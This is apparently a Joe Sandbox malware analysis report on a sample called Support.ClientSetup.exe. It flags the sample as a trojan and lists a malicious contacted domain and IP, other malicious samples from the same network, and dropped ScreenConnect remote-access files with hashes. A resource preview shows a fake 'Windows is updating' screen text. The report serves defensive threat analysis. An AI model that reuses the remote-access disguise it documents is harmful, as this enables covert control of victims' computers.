                                  https://t0.ssl.ak.dynamic.tiles.virtualea0%Avira URL Cloudsafe
                                  https://t0.ssl.ak.dynamic.tilx0%Avira URL Cloudsafe
                                  https://t0.ssl.ak.dynamic0%Avira URL Cloudsafe

                                  Domains and IPs

                                  Contacted Domains

                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  fmt2as.ddns.net
                                  		194.59.31.27
                                  		truetrue
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000D.00000003.1366738631.0000016E2D866000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 0000000D.00000003.1366443338.0000016E2D887000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000D.00000003.1366660793.0000016E2D86D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000D.00000003.1366738631.0000016E2D866000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368110330.0000016E2D813000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368525737.0000016E2D864000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vrundll32.exe, 00000005.00000003.1074517590.0000000004DDF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1079266579.0000000004CD3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1074517590.0000000004E4E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                                      		high
                                                      https://docs.rs/getrandom#nodejs-es-module-supportScreenConnect.WindowsCredentialProvider.dll.3.drfalse
                                                        		high
                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000D.00000003.1367273272.0000016E2D83C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367151955.0000016E2D850000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=svchost.exe, 0000000D.00000003.1366905237.0000016E2D85D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://crl.ver)svchost.exe, 0000000C.00000002.2323244715.0000027972E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://g.live.com/odclientsettings/ProdV2/C:svchost.exe, 0000000C.00000003.1202799313.0000027972D00000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.drfalse
                                                                    		high
                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000D.00000003.1367151955.0000016E2D850000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://wixtoolset.org/news/rundll32.exe, 00000005.00000003.1074517590.0000000004DDF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1079266579.0000000004CD3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1074517590.0000000004E4E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                                                        		high
                                                                        https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368525737.0000016E2D864000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368595211.0000016E2D882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367129633.0000016E2D821000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000D.00000002.1368110330.0000016E2D813000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://g.live.com/odclientsettings/Prod/C:edb.log.12.drfalse
                                                                                      		high
                                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000D.00000002.1368177362.0000016E2D81D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://wixtoolset.org/releases/rundll32.exe, 00000005.00000003.1074517590.0000000004DDF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1079266579.0000000004CD3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1074517590.0000000004E4E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                                                                          		high
                                                                                          https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368177362.0000016E2D81D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://dynamic.tsvchost.exe, 0000000D.00000003.1367273272.0000016E2D83C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://t0.ssl.ak.dynamic.tilxsvchost.exe, 0000000D.00000002.1368378344.0000016E2D83F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367273272.0000016E2D83C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll.3.drfalse
                                                                                                  		high
                                                                                                  https://t0.ssl.ak.dynamicsvchost.exe, 0000000D.00000002.1368378344.0000016E2D83F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367273272.0000016E2D83C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameScreenConnect.ClientService.exe, 00000008.00000002.2321754892.000000000240B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160978410.0000000003461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.bingmapsportal.comsvchost.exe, 0000000D.00000002.1368208506.0000016E2D824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1366957520.0000016E2D822000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368525737.0000016E2D864000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367129633.0000016E2D821000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368110330.0000016E2D813000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://t0.ssl.ak.dynamic.tiles.virtualeasvchost.exe, 0000000D.00000002.1368378344.0000016E2D83F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367273272.0000016E2D83C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000D.00000003.1366738631.0000016E2D866000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368110330.0000016E2D813000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000D.00000002.1368595211.0000016E2D882000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000D.00000003.1367377143.0000016E2D84E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high

                                                                                                                    World Map of Contacted IPs

                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs

                                                                                                                    Public IPs

                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    194.59.31.27
                                                                                                                    		fmt2as.ddns.netGermany
                                                                                                                    		30823COMBAHTONcombahtonGmbHDEtrue

                                                                                                                    Private

                                                                                                                    IP
                                                                                                                    127.0.0.1

                                                                                                                    General Information

                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                    Analysis ID:1568673
                                                                                                                    Start date and time:2024-12-04 20:04:58 +01:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 7m 55s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:25
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:0
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Sample name:Support.ClientSetup.exe
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal50.troj.evad.winEXE@26/58@1/2
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 80%
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 68%
                                                                                                                    • Number of executed functions: 208
                                                                                                                    • Number of non-executed functions: 1
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                    Warnings

                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                                                    • Excluded IPs from analysis (whitelisted): 23.218.208.109
                                                                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, evoke-windowsservices-tas.msedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                    • Execution Graph export aborted for target rundll32.exe, PID 6168 because it is empty
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                    • VT rate limit hit for: Support.ClientSetup.exe

                                                                                                                    Simulations

                                                                                                                    Behavior and APIs

                                                                                                                    TimeTypeDescription
                                                                                                                    14:05:44API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                    14:06:51API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                                                    Joe Sandbox View / Context

                                                                                                                    IPs

                                                                                                                    No context

                                                                                                                    Domains

                                                                                                                    No context

                                                                                                                    ASNs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    COMBAHTONcombahtonGmbHDECounseling_Services_Overview.docmGet hashmaliciousUnknownBrowse
                                                                                                                    • 45.147.231.195
                                                                                                                    Nowe zam#U00f3wienie - 0072291855.pdf (243KB).com.exeGet hashmaliciousQuasarBrowse
                                                                                                                    • 194.59.31.75
                                                                                                                    https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.htmlGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                    • 194.59.31.199
                                                                                                                    https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.htmlGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                    • 194.59.31.199
                                                                                                                    firestub.batGet hashmaliciousUnknownBrowse
                                                                                                                    • 194.59.30.10
                                                                                                                    Cotizaci#U00f3n 99026475526_pdf.com.exeGet hashmaliciousQuasarBrowse
                                                                                                                    • 194.59.31.75
                                                                                                                    file.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                    • 194.59.30.222
                                                                                                                    DEMASI-24-12B DOC. SCAN.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                    • 194.59.31.40
                                                                                                                    Orden de Noviembre.com.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                    • 194.59.31.47
                                                                                                                    monthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                    • 194.59.30.201

                                                                                                                    JA3 Fingerprints

                                                                                                                    No context

                                                                                                                    Dropped Files

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Client.dllf53WqfzzNt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                      tiG6Ep202n.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                        6IqUjK9Koj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                          f53WqfzzNt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                            tiG6Ep202n.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                              6IqUjK9Koj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                hB52OUUCE2.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                  lCwus2wfk6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                    pbenHWj8JO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                      VVs9SAqm5N.exeGet hashmaliciousScreenConnect ToolBrowse

                                                                                                                                        Created / dropped Files

                                                                                                                                        C:\Config.Msi\3b7ed6.rbs

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):219736
                                                                                                                                        Entropy (8bit):6.5817353625566986
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3072:hg9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGt:hguH2aCGw1ST1wQLdqvt
                                                                                                                                        MD5:8D75DD9A63D90C5C6902BD3C7B862EB1
                                                                                                                                        SHA1:FA013107D6D49A0C0E43D6151AF0CA2C517EAA8C
                                                                                                                                        SHA-256:B801A45EC0A78997648E49255B235D6A3FF2676D68284129E93CC81A54B38DEA
                                                                                                                                        SHA-512:8B40022160003749FB39DD25088D56F853AB431F41346D16230F9AD2C6E0AE0FCA8F0994C8F82713212B5667BC80F3AA8773977605801DB909D6919F7802664B
                                                                                                                                        Malicious:false
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\3b7ed6.rbs, Author: Joe Security
                                                                                                                                        Preview:...@IXOS.@.....@.p.Y.@.....@.....@.....@.....@.....@......&.{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}'.ScreenConnect Client (a9232c38f7080cfd)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (a9232c38f7080cfd)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{0ED93A37-D914-4786-4DE4-5166DDDFF5DB}&.{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}.@......&.{AD71803F-3650-93C2-8A8A-F94B61FB08A9}&.{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}.@......&.{DEF0A81D-558D-FB7C-4CE8-CE27F564707C}&.{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}.@......&.{46F1D0F8-DF22-16D8-6585-517801B66243}&.{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}.@......&.{FB083756-261E-B3C0-9FCC-3340BEB95187}&.{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}.@......&.{29F4E2EF-B149-6F4D-C2B1-79D5C4EECF14}&.{F9AF0EC3-4E4A-7A37-BF0D

                                                                                                                                        C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\Client.Override.en-US.resources

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):374
                                                                                                                                        Entropy (8bit):4.835279329387413
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:8kVXdyrKDLIP12MUAvvR+oHscNOLG6cAtdMwcqlCMkMwFpRHkEYaDHwercjGs:rHy2DLI4MWoHX89cAP5TlO5FMD+Hc6s
                                                                                                                                        MD5:29E046B4E6C3EE0C3E06662C5D3161A1
                                                                                                                                        SHA1:C7BF6CF354E0560C26F759B2E47821491C2DC01E
                                                                                                                                        SHA-256:EB989C88C2A3BF8FA7207B0C651E0C7D6A3424FFA8C3AB0FEA0A9AAE616A3FC8
                                                                                                                                        SHA-512:0D3B146C8EBA13D1F937B6D124505B9AAB04FA79631CADB416FE8B2C199A4E60768CE18FD69AC243A1D469E39566A630A87D7574DFA4A90B193D311BA0C3DC5F
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.4...n_%.......4... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....FS.e.s.s.i.o.n.I.n.v.a.l.i.d.S.e.s.s.i.o.n.D.e.l.e.t.e.d.M.e.s.s.a.g.e.;....9Windows is updating... Please do not turn off your device..ERROR

                                                                                                                                        C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\Client.Override.resources

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):257
                                                                                                                                        Entropy (8bit):4.896176001960815
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2epExpKCl1nSJk0k:rHy2DLI4MWoj12eKfKCKxk
                                                                                                                                        MD5:C72D7889B5E0BB8AC27B83759F108BD8
                                                                                                                                        SHA1:2BECC870DB304A8F28FAAB199AE6834B97385551
                                                                                                                                        SHA-256:3B231FF84CBCBB76390BD9560246BED20B5F3182A89EAF1D691CB782E194B96E
                                                                                                                                        SHA-512:2D38A847E6DD5AD146BD46DE88B9F37075C992E50F9D04CCEF96F77A1E21F852599A57CE2360E71B99A1CCBC5E3750D37FDB747267EA58A9B76122083FB6A390
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..........6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.......#03c6fc.

                                                                                                                                        C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\Client.en-US.resources

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):50133
                                                                                                                                        Entropy (8bit):4.759054454534641
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                        MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                        SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                        SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                        SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

                                                                                                                                        C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\Client.resources

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):26722
                                                                                                                                        Entropy (8bit):7.7401940386372345
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                        MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                        SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                        SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                        SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

                                                                                                                                        C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Client.dll

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):197120
                                                                                                                                        Entropy (8bit):6.586775768189165
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3072:/xLtNGTlIyS7/ObjusqVFJRJcyzvYqSmzDvJXYF:FtNGTGySabqPJYbqSmG
                                                                                                                                        MD5:3724F06F3422F4E42B41E23ACB39B152
                                                                                                                                        SHA1:1220987627782D3C3397D4ABF01AC3777999E01C
                                                                                                                                        SHA-256:EA0A545F40FF491D02172228C1A39AE68344C4340A6094486A47BE746952E64F
